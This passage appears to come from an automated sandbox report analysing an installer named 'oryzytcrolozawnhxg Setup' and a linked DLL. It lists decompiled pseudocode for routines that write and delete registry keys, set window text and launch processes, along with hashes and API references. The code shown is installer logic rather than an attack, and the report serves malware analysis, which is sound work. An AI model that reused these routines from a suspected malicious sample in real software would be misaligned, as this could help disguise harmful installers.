                                      0x10003199
                                      0x00000000
                                      0x10003197
                                      0x100031ba
                                      0x100031c0
                                      0x100031cf
                                      0x100031c2
                                      0x100031c7
                                      0x100031c7
                                      0x100031d8
                                      0x100031db
                                      0x100031db
                                      0x100031f4
                                      0x10003203
                                      0x10003211
                                      0x10003205
                                      0x10003205
                                      0x10003205
                                      0x10003224
                                      0x10003028
                                      0x10003028
                                      0x10003028
                                      0x10004b6f

                                      APIs
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 10003150
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ByteCharMultiWide
                                      • String ID: Ansi$EM_GETLINE: got %u characters$EM_GETLINE: row=%d, nMaxChars=%d (%s)$Unicode
                                      • API String ID: 626452242-2053147572
                                      • Opcode ID: 1c981d310823cc8dc6c551e4769e2d1440a88619568040abbe26955304cdb8ee
                                      • Instruction ID: 698bad97488f1ed7258124122135d4fccc31c92632c1560c3141a7a3769bf058
                                      • Opcode Fuzzy Hash: 1c981d310823cc8dc6c551e4769e2d1440a88619568040abbe26955304cdb8ee
                                      • Instruction Fuzzy Hash: 178135B4D04219DFEB25CF94D995BEEB7B5FB48340F208199E909A7245DB306E80CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040373D, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0040373D(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004058A2(__ecx, "1033");
				while(1) {
					_t26 =  *0x42eba4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42eb70; // 0x720250
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42eba0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e340 = _t18[1];
					 *0x42ec08 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e33c = _t23;
						E00405889(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x429fb0, E0040594D(_t13, _t24, _t26, "oryzytcrolozawnhxg Setup", 0xfffffffe));
						_t11 =  *0x42eb8c; // 0x4
						_t27 =  *0x42eb88; // 0x7203fc
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x720414
								_t11 = E0040594D(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                                      0x00403741
                                      0x00403746
                                      0x0040374c
                                      0x00403751
                                      0x00403751
                                      0x00403759
                                      0x00000000
                                      0x00000000
                                      0x0040375b
                                      0x00403761
                                      0x00403769
                                      0x0040376b
                                      0x00403771
                                      0x00403771
                                      0x00403773
                                      0x0040377f
                                      0x00000000
                                      0x00000000
                                      0x00403783
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403785
                                      0x0040378a
                                      0x00403793
                                      0x00403799
                                      0x0040379e
                                      0x004037b2
                                      0x004037bd
                                      0x004037d5
                                      0x004037db
                                      0x004037e0
                                      0x004037e8
                                      0x00403809
                                      0x00403809
                                      0x00403809
                                      0x004037ea
                                      0x004037ec
                                      0x004037ec
                                      0x004037f0
                                      0x004037f3
                                      0x004037f7
                                      0x004037f7
                                      0x004037fc
                                      0x00403802
                                      0x00403802
                                      0x00000000
                                      0x004037ec
                                      0x004037a0
                                      0x004037a5
                                      0x004037ae
                                      0x004037a7
                                      0x004037a7
                                      0x004037a7
                                      0x004037a5

                                      APIs
                                      • SetWindowTextA.USER32(00000000,oryzytcrolozawnhxg Setup), ref: 004037D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: TextWindow
                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\$oryzytcrolozawnhxg Setup$xr
                                      • API String ID: 530164218-2657488401
                                      • Opcode ID: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                      • Instruction ID: 6f81ae46ae74fa932ba8997680672ace7202a58944f3865a8996007a7eeda288
                                      • Opcode Fuzzy Hash: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                                      • Instruction Fuzzy Hash: 7511C6F9B005119BC735DF56DC80A737BADEB84316368817BEC02A7391D73DAD029A98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004022F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t30 =  *0x42ec10; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a378) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a378 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E44( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a378, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a378, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *(_t37 - 4);
				return 0;
			}











                                      0x004022f6
                                      0x004022fb
                                      0x00402305
                                      0x0040230f
                                      0x00402312
                                      0x0040231c
                                      0x0040232c
                                      0x00402333
                                      0x0040233b
                                      0x00402349
                                      0x0040234d
                                      0x00402358
                                      0x00402358
                                      0x0040235c
                                      0x00402360
                                      0x00402366
                                      0x0040236b
                                      0x0040236b
                                      0x0040236f
                                      0x0040237b
                                      0x0040237b
                                      0x00402394
                                      0x00402396
                                      0x00402396
                                      0x00402399
                                      0x0040246f
                                      0x0040246f
                                      0x00402880
                                      0x0040288c

                                      APIs
                                      • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj1052.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                                      • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsj1052.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj1052.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CloseCreateValuelstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\nsj1052.tmp
                                      • API String ID: 1356686001-1688940567
                                      • Opcode ID: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                      • Instruction ID: 68e10371c4729356781e9985955bb9a28b8d5e30648407f5ab20691da4643e4d
                                      • Opcode Fuzzy Hash: a5f1fc052dec93739e248a182860329b9e12ab8a7e21bf283b290d0f06727023
                                      • Instruction Fuzzy Hash: 1B1172B1E00208BFEB10ABA5DE4EEAF767CEB00758F10443AF505B71D0D7B89D419A69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402A28, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 84%
                                      			E00402A28(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x42ec10; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A28(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405C49(2);
					if(_t27 == 0) {
						__eflags =  *0x42ec10; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ec10, 0);
				}
				return _t18;
			}










                                      0x00402a38
                                      0x00402a49
                                      0x00402a51
                                      0x00402a79
                                      0x00402a60
                                      0x00402a63
                                      0x00402ab3
                                      0x00402ab9
                                      0x00402abb
                                      0x00000000
                                      0x00402abb
                                      0x00402a70
                                      0x00402a75
                                      0x00402a77
                                      0x00000000
                                      0x00000000
                                      0x00402a77
                                      0x00402a8e
                                      0x00402a96
                                      0x00402a9d
                                      0x00402ac3
                                      0x00402ac9
                                      0x00000000
                                      0x00000000
                                      0x00402ad1
                                      0x00402ad7
                                      0x00402ad9
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402ad9
                                      0x00000000
                                      0x00402aac
                                      0x00402ac0

                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                                      • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                                      • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Close$DeleteEnumOpen
                                      • String ID:
                                      • API String ID: 1912718029-0
                                      • Opcode ID: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                      • Instruction ID: 9b693693afe27744eb74945a5ab88af436457a169b5d028682666f5dd4735d18
                                      • Opcode Fuzzy Hash: 67ce441666b2dfd9254d3678beef5a316d57c22f87aba3efa5689cf0a4389e91
                                      • Instruction Fuzzy Hash: 07119A31600109FFDF21AF91DE49DAB3B2DEB40394B00453AFA01B10A0DBB59E41EF69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                      0x00401ccb
                                      0x00401cd2
                                      0x00401d01
                                      0x00401d09
                                      0x00401d10
                                      0x00401d10
                                      0x00402880
                                      0x0040288c

                                      APIs
                                      • GetDlgItem.USER32 ref: 00401CC5
                                      • GetClientRect.USER32 ref: 00401CD2
                                      • LoadImageA.USER32 ref: 00401CF3
                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                      • DeleteObject.GDI32(00000000), ref: 00401D10
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                      • Instruction ID: 5b52a60f850666e7e12d56efb71538ab26ca797e9f055acb3b10a0d9f88dae52
                                      • Opcode Fuzzy Hash: c4a47ce9881a1f69b5484b78f7b8908d95eb4cef416732969b071724251a1cb6
                                      • Instruction Fuzzy Hash: 26F0FFB2A04105BFD700EBA4EE89DAF77BDEB44341B104476F601F6190C7749D018B29
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004044B6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 51%
                                      			E004044B6(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E0040594D(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E0040594D(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E0040594D(_t34, 0, 0x429fd8, 0x429fd8, _a8);
				wsprintfA(_t26 + lstrlenA(0x429fd8), "%u.%u%s%s");
				return SetDlgItemTextA( *0x42e338, _a4, 0x429fd8);
			}













                                      0x004044be
                                      0x004044c2
                                      0x004044ca
                                      0x004044cd
                                      0x004044ce
                                      0x004044d0
                                      0x004044d2
                                      0x004044d5
                                      0x004044d5
                                      0x004044dc
                                      0x004044e2
                                      0x004044e2
                                      0x004044e9
                                      0x004044f4
                                      0x004044f5
                                      0x004044f8
                                      0x004044f8
                                      0x00404505
                                      0x00404510
                                      0x00404513
                                      0x00404525
                                      0x0040452c
                                      0x0040452d
                                      0x0040453c
                                      0x0040454c
                                      0x00404568

                                      APIs
                                      • lstrlenA.KERNEL32(00429FD8,00429FD8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004043D6,000000DF,0000040F,00000400,00000000), ref: 00404544
                                      • wsprintfA.USER32 ref: 0040454C
                                      • SetDlgItemTextA.USER32 ref: 0040455F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s
                                      • API String ID: 3540041739-3551169577
                                      • Opcode ID: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                      • Instruction ID: e44b7de75f1afc080fd53ae6a7962c6c3308310fc923ee70d3b0388825d49f6b
                                      • Opcode Fuzzy Hash: 9ef419584118109bfe096c59dc58bdf2b1081d5b2e965ff29ec39ca84245abfe
                                      • Instruction Fuzzy Hash: CE11E2B3A0022467DB10A66A9C05EAF36599BC2334F14023BFA29F61D1E9388C1186A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 51%
                                      			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405889();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                      0x00401bb6
                                      0x00401bc2
                                      0x00401bc5
                                      0x00401bce
                                      0x00401bce
                                      0x00401bd1
                                      0x00401bd5
                                      0x00401bde
                                      0x00401bde
                                      0x00401be1
                                      0x00401be5
                                      0x00401be7
                                      0x00401c34
                                      0x00401c36
                                      0x00401c3f
                                      0x00401c47
                                      0x00401c4a
                                      0x00401c4a
                                      0x00401c53
                                      0x00000000
                                      0x00401be9
                                      0x00401bf0
                                      0x00401bf2
                                      0x00401bfa
                                      0x00401bfd
                                      0x00401c25
                                      0x00401c59
                                      0x00401c59
                                      0x00401bff
                                      0x00401c0d
                                      0x00401c15
                                      0x00401c18
                                      0x00401c18
                                      0x00401bfd
                                      0x00401c5c
                                      0x00401c5f
                                      0x00401c65
                                      0x00402825
                                      0x00402825
                                      0x00402880
                                      0x0040288c

                                      APIs
                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: MessageSend$Timeout
                                      • String ID: !
                                      • API String ID: 1777923405-2657877971
                                      • Opcode ID: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                      • Instruction ID: 5ea9a142a0052d8e356a619bc15d353e54371354b2f8ef601c25db15878fdf82
                                      • Opcode Fuzzy Hash: 672c969f6ffa347aa3c7b0db73338ddc2672c41c0f2d80c96ed6a2b1a5ff1745
                                      • Instruction Fuzzy Hash: 0A2183B1A44104AEEF01AFB5CD5BAAD7A75EF41704F14047AF501B61D1D6B88940D728
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 1000C230, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 58%
                                      			E1000C230() {
				intOrPtr _v8;
				struct _WNDCLASSW _v48;

				0x10000000("semi stub\n");
				_v48.cbClsExtra = 0;
				_v48.cbWndExtra = 4;
				_v48.hInstance = 0;
				_v48.hIcon = 0;
				_v48.hCursor = 0;
				_v48.hbrBackground = 6;
				_v48.lpszMenuName = 0;
				if( *0x10023874 == 0) {
					_v48.style = 0x4088;
					_v48.lpfnWndProc = E1000C1E0;
					_v48.lpszClassName = L"REListBox20W";
					if((RegisterClassW( &_v48) & 0x0000ffff) != 0) {
						 *0x10023874 = 1;
					}
				}
				if( *0x10023878 == 0) {
					_v48.style = 0x408b;
					_v48.lpfnWndProc = E1000C190;
					_v48.lpszClassName = L"REComboBox20W";
					if((RegisterClassW( &_v48) & 0x0000ffff) != 0) {
						 *0x10023878 = 1;
					}
				}
				_v8 = 0;
				if( *0x10023874 != 0) {
					_v8 = _v8 + 1;
				}
				if( *0x10023878 != 0) {
					_v8 = _v8 + 2;
				}
				return _v8;
			}





                                      0x1000c23b
                                      0x1000c243
                                      0x1000c24a
                                      0x1000c251
                                      0x1000c258
                                      0x1000c25f
                                      0x1000c266
                                      0x1000c26d
                                      0x1000c27b
                                      0x1000c27d
                                      0x1000c284
                                      0x1000c28b
                                      0x1000c2a1
                                      0x1000c2a3
                                      0x1000c2a3
                                      0x1000c2a1
                                      0x1000c2b4
                                      0x1000c2b6
                                      0x1000c2bd
                                      0x1000c2c4
                                      0x1000c2da
                                      0x1000c2dc
                                      0x1000c2dc
                                      0x1000c2da
                                      0x1000c2e6
                                      0x1000c2f4
                                      0x1000c2fc
                                      0x1000c2fc
                                      0x1000c306
                                      0x1000c30e
                                      0x1000c30e
                                      0x1000c317

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ClassRegister
                                      • String ID: REListBox20W$semi stub
                                      • API String ID: 2764894006-902630105
                                      • Opcode ID: 48d770b24fbf94afe58b72655f91c47749ccb76f810f66546f5d07188698f6f8
                                      • Instruction ID: ab61b2e85b1783ad8925f31245d8954ca0ab6f8b2db5bb2e3fd5f2d8cd9e2fd3
                                      • Opcode Fuzzy Hash: 48d770b24fbf94afe58b72655f91c47749ccb76f810f66546f5d07188698f6f8
                                      • Instruction Fuzzy Hash: 8921C3B4C0135CDBEB00CFE5C9887EEBBF5EB04349F608158D5416B284D7BA9A89CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040518B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0040518B(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42bfe0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42bfe0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                      0x00405194
                                      0x004051b0
                                      0x004051b8
                                      0x004051bd
                                      0x00000000
                                      0x004051c3
                                      0x004051c7

                                      APIs
                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE0,Error launching installer), ref: 004051B0
                                      • CloseHandle.KERNEL32(?), ref: 004051BD
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040518B
                                      • Error launching installer, xrefs: 0040519E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                      • API String ID: 3712363035-2984075973
                                      • Opcode ID: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                                      • Instruction ID: 2907f660324095bb22c49bf820cefbd87778b5f2e5ee3a47b55f65b03477d649
                                      • Opcode Fuzzy Hash: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
